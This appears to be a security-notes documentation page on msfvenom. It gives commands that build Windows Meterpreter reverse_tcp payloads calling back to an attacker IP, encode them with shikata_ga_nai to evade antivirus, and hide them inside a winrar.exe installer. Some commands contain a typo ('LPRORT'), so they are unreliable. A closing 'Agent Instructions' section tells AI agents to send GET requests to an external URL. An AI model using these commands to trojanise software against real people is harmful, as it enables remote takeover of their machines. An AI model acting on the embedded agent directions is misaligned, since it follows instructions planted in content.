# msfvenom

A **client-side attack** happens when an attacker tricks a user into running a harmful file on their computer. Once the file runs, it secretly connects back to the attacker.

Hackers often use **social engineering** to make people open infected documents or programs. Instead of attacking weak software or services, they **target human mistakes**—like clicking on unsafe links or opening suspicious files.

Since this type of attack places a harmful file on the user’s computer, attackers must be careful to avoid detection by **antivirus (AV) software**.

## What is msfvenom?

**msfvenom** is a command-line tool used to create and encode harmful payloads for different operating systems and web servers. It combines two tools: **msfpayload** and **msfencode**.

With msfvenom, we can create a dangerous payload (like a **Meterpreter** payload) that can be sent to a target computer. Once the target runs the payload, it connects back to us and gives us remote control over their system.

{% code overflow="wrap" %}

```bash
msfvenom --list payloads

windows/x64/meterpreter/reverse_http
linux/x64/meterpreter/reverse_http

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPRORT=[PORT] -f exe > /home/payloadx86.exe

msfvenom --list formats
```

{% endcode %}

## Encoding Payloads

Since this type of attack involves placing a malicious file on the client’s system (disk), attackers must be aware of **antivirus (AV) detection**. Most AV software uses **signature-based detection** to find harmful files or programs. To bypass older AV systems, attackers can **encode** their payloads. **Encoding** changes the payload's code in a way that alters its signature, making it harder for AV software to recognize it.

**Shellcode** is a small piece of code used as part of an attack. It’s called "shellcode" because it gives the attacker access to a **command shell** on the target system, allowing them to run commands remotely.

{% code overflow="wrap" %}

```bash
x86/shikata_ga_nai # polymorphic XOR additive feedback encoder
```

{% endcode %}

**x86/shikata\_ga\_nai** is a **polymorphic XOR additive feedback encoder** used in tools like **msfvenom** to encode payloads and help them avoid detection by antivirus software.

* **x86** refers to the architecture of the system, typically meaning 32-bit Intel-based processors.
* **Shikata\_ga\_nai** is the name of this encoding technique. It comes from a Japanese phrase meaning "it can't be helped," symbolizing the persistence and effectiveness of the encoder.
* **Polymorphic** means the encoder changes the appearance of the payload each time it’s used, so the signature looks different, even though the payload itself remains the same.
* **XOR additive feedback** is a method used to modify the payload's code. It uses XOR (a binary operation) in combination with feedback loops to change the shellcode in a way that antivirus programs may not recognize it as malicious.

This encoder helps disguise the payload, making it harder for signature-based antivirus tools to detect it.

{% code overflow="wrap" %}

```bash
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPRORT=[PORT] -e x86/shikata_ga_nai -f exe > /home/payloadx86.exe

# specifying iteration
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPRORT=[PORT] -i 10 -e x86/shikata_ga_nai -f exe > /home/payloadx86.exe
```

{% endcode %}

## Injecting Payloads to Windows Portable Executables

<pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong># The -x option allows you to specify a template or existing executable that you want to use as a starting point.
</strong><strong>msfvenom -x 
</strong><strong>
</strong><strong># The -k option is used to keep the generated payload’s shellcode from having any specific exit functions.
</strong>msfvenom -k

# using winrar
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPRORT=[PORT] -e x86/shikata_ga_nai -i 10 -f exe -x winrar.exe > /home/winrar.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPRORT=[PORT] -e x86/shikata_ga_nai -i 10 -f exe -k -x winrar.exe > /home/winrar.exe
</code></pre>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security.navidnaf.com/ollivanders/metasploit-framework/msfvenom.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.